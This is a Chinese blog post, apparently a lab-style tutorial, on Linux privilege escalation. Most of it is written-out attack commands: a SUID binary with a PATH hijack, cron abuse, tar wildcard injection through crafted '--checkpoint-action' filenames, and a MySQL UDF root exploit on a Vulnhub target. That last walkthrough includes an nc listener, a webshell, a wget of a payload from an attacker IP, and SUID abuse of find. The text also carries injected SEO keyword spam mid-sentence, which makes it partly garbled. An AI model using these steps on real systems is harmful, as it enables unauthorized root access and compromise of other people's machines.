LinuxGod

LinuxGod.net
Linux大神网——精选每一篇高品质的技术干货
  1. 首页
  2. 开源快讯
  3. 正文

Linux定时任务安全权限提升)

2023年1月16日 225点热度

权限提升-Linux定时任务&环境变量&数据库

linux执行权限和写权限_linux提升权限_termux提升root权限

termux提升root权限_linux执行权限和写权限_linux提升权限

权限提升

Linux权限

用户的权限用“id”命令来查看,权限分为uid、gid、groups,即属主、属组、其他

文件的权限又分为rwx,即读、写、执行,由三组二进制数据表示

Linux提权本地环境变量安全-Aliyun

提权条件:复制了SUID权限,还需要本地用户权限

提权原理:借环境变量的执行顺序永久免费linux服务器linux查看操作系统,替换了高权限的命令,获取权限

注意:虽然例子中的“shell”文件是我们自己写的,但这里是模拟的用户自己配置的有SUID权限的文件。我们替换了该文件中被调用的命令,获得了root权限的反弹窗口

替换命令的方法是借助环境变量会逐个文件夹找命令的运行逻辑,在被执行的命令之前就加一个同名的环境变量

提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发

手写文件demo.c,里面包含“ps”命令

#include

void main()

{

setuid(0);

setgid(0);

system(“ps”);

}

将demo.c编译成shell

gcc demo.c -o shell

将shell文件复制到目标机器中,给予SUID权限

增加环境变量,注意此时“tmp”文件夹还不是环境变量的文件夹

cp /bin/sh /tmp/ps

将“tmp”文件夹的内容划为环境变量

export PATH=/tmp:$PATH

执行“shell”触发,反弹一个窗口

./shell

查看权限,发现已经变成了root权限

id

Linux提权本地定时任务安全-Aliyun

第一种:路径问题(未实现)

提权原理:利用计划任务指向的文件的相对路径解析问题

计划任务使用相对路径来指定命令时,默认路径是“/usr/local/bin”。在当前用户的目录下创建相同名字的文件,会比默认路径优先级更高

提权过程:

查看当前的定时任务

cat /ect/crontab

在当前用户的目录下创建相同名字的文件,其中包含获取root权限的命令

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh

chmod +x /home/xiaodi/test.sh

/tmp/bash

第二种:命令问题(WS注入)

提权条件:有通配符的可以调用其他命令的命令被放入计划任务中

提权原理:利用通配符配合命令参数自定义命令实现提权

可以将通配符所匹配的内容写成命令的参数,调用其他命令

提权过程:

我们首先假设目标机器上有类似如下带有通配符的任务

不安全定时任务备份命令:

cd /home/undead/script;tar czf /tmp/backup.tar.gz *

新建“test.sh”,其中有获取root权限的命令

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh

新建两个文件,文件名代替通配符时会和命令组合成新命令,执行“test.sh”

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

等到定时任务完成,调用已经获得root权限的bash

./bash -p

参考命令:其他命令是否可以请查看《Linux提权手法总结.pdf》

第三种:权限问题

提权原理:利用不安全的权限分配操作导致的定时文件覆盖

管理员没有正确的赋予权限,比如给了文件777的权限,导致定时任务可以被修改

Linux提权数据库MYSQL_UDF-Vulnhub

提权过程:Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用Mysql提权Linux(Mysql版本区别同Windows)

探针IP及端口

nmap 192.168.76.0/24

利用phpmailer漏洞进行修改并反弹

python D:/Myproject/40974.py

nc -lvvp 4444

写入后门利用菜刀连接方便操作

echo '' >1.php

上传信息收集脚本进行提权信息收集

termux提升root权限_linux提升权限_linux执行权限和写权限

./LinEnum.sh

翻阅数据库配置文件获取root密码

利用Mysql提权searchsploit

下载mysql udf poc进行编译,建议在本地

wget

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

编译成.so文件,即动态链接库

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

上传或下载1518到目标服务器,这里是目标服务器下载从攻击方下载

wget [攻击者IP]/1518.so

进入数据库进行UDF导出(导出dll文件并执行命令执行函数实现提权,跟Windows一样)

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建do_system函数调用

linux提升权限_linux执行权限和写权限_termux提升root权限

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /usr/bin/find');

配合使用find调用执行

touch xiaodi

find xiaodi –exec "whoami" ;

find xiaodi –exec "/bin/sh" ;

id

Linux提权提升简单总结归类-参考PDF

1.提权环境(web环境、本地环境),信息收集(SUID、定时任务、可能漏洞、第三方服务应用等)

2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)

3.最新漏洞:本地searchsploit脚本及远程exploitdb站点搜索说明(简要使用)

4.其他提权方法如:密码复用,guidlinux提升权限linux提升权限,sudo等说明(运气,同理,鸡肋等)

SUDO说明参考:

涉及资源:

exploit database:

RAVEN: 2(vulnhub的靶场):,269/

exploitdb(Linux工具):

Linux下的tar压缩解压缩命令详解:

CVE-2019-14287:sudo权限绕过漏洞分析与复现:

本作品采用 知识共享署名 4.0 国际许可协议 进行许可
标签: 变量 命令 定时 权限 漏洞
最后更新:2023年1月16日

Linux大神网

每日更新,欢迎收藏♥ 不积跬步无以至千里,加油,共勉。

点赞
< 上一篇
下一篇 >

Linux大神网

每日更新,欢迎收藏♥
不积跬步无以至千里,加油,共勉。

最新 热点 随机
最新 热点 随机
如何利用linux来开发属于自己的嵌入式Linux操作系统 腦/網絡>操作系統/系統-alternate-i386.iso(EXT)这几个版本有什么区别 精通unixshell脚本编程之文件描述符数ulimitulimit-n ubuntu离线安装软件 鸿蒙OS环境搭建过程中遇到的问题及解决方案 写入数据覆盖的分析与执行 解读Rainbond集群的安装和运维的原理,便于用户搭建Rainbond Linux基础知识:文件描述符、文件指针、索引节点 如何解决Linux下的无线网卡驱动的问题? linux 文件描述符 (师)-unused-fdKernel:2.6.14CPUarchitecture Linux系统下如何搭建SVN服务器,详细说明各配置项的功能 修改软件源文件、UI界面设置换源操作|Ubuntu Ubuntu14.04.2为例进行说明,其它Ubuntu版本与此类似 Linux图形界面用户和Windows用户来说获取系统硬件信息都不算问题 Ubuntu下换内核的过程及详细分析内核操作分析 100篇文章内存管理——内存回收入口 Web站点,utsa,,/usp/为读者提供大量资料 Linux内核源码/内存/文件系统/进程管理/设备 TeXLive和MiKTeX两大主要发行版的镜像配置方法 安全增强式Linux(SELinuxLinux)内核修改和用户空间工具 Ubuntu系统下安装字体和切换默认字体的方法系统
ubuntu离线安装软件 鸿蒙OS环境搭建过程中遇到的问题及解决方案精通unixshell脚本编程之文件描述符数ulimitulimit-n腦/網絡>操作系統/系統-alternate-i386.iso(EXT)这几个版本有什么区别如何利用linux来开发属于自己的嵌入式Linux操作系统Linux嵌入式系统智能手机系统的硬件设计Unix或者类Unix文件系统中的每个文件(或者目录)打开U盘什么文件都看不到小编总结了基于嵌入式Linux的智能手机系统软件的设计与实现如何在Linux中使用Firejail运行应用程序访问某个目录基于嵌入式��闹悄苁只�长沙理工大学C语言教程-Qt.12安装教程05-27Linux有7个运行级别(关机,停机模式、DellG3)(Linux基础知识)文件压缩、打包命令解析的Linux操作系统怎样执行?LinuxDNS服务器,如何安装、配置和维护它?AMD2950x+技嘉x399免驱USB网卡,我的无线网卡linux解压gz文件命令 蓝易云香港五网CN2网络压缩比率的测试环境Linux系统中用于管理和控制系统服务的强大工具介绍围绕API创建封装器的开源项目正变得越来越流行主频93.75MHz的MIPS64NECVR4300处理器在N64上运行
【干货】管理用户(user)的工具或命令! 如何查看Linux内核版本的命令(2种方法)? Ubuntu14.04.2为例进行说明,其它Ubuntu版本与此类似 物理内存大许多倍的内存管理子系统是怎么来的?(图) Ubuntu和其他Linux中安装最新的LibreOffice版本的快速指南 系统备份和恢复:ISO文件的一些常见用途和用途 我们如何才能破解安卓设备呢?留下的后门权限 新公司的测试机磁盘空间空余很小简要记录以备忘 linux 创建链接文件 Linux链接分两种,一种被称为硬链接(SymbolicLink) 普联技术有限公司程序的安装包使用方法通过-LINK Linux系统的启动过程,来说一说启动顺序详解 红旗Linux桌面版4.0从软盘启动硬盘最详细的安装图解 (干货)linux心来的一层经典 如何查看Linux硬盘的大小、类型和硬件信息?方法 研究一下Linux内存管理的32位Linux系统--虚拟地址 如何实现局域网内的文件夹共享?全面详细详细地向 上海会计从业资格考试:关联数据acceptfd VMware过期Linux系统CentOS7下载安装1.77下载地址 快速解决Java服务线上CPU问题,掌握排查思路! 科林·沃森:Ubuntu默认是关闭root帐户的,这样做
标签聚合
linux服务器 linux系统 电脑 软件 虚拟机 文件目录 命令模式 命令 sudo linux脚本
书籍
课程
技术群
技术干货大合集↓
  • 2023年6月 / 20篇
  • 2023年5月 / 93篇
  • 2023年4月 / 90篇
  • 2023年3月 / 129篇
  • 2023年2月 / 84篇
  • 2023年1月 / 161篇
  • 2022年12月 / 187篇
  • 2022年11月 / 76篇
友情链接:

Linux书籍 | Linux命令 | Linux系统 | RHCE红帽认证 | Linux软件 | Linux教程 | CentOS系统 | Linux内核 | Linux服务器 | Linux大神 | IT资源

COPYRIGHT © 2023 linuxgod.net ALL RIGHTS RESERVED.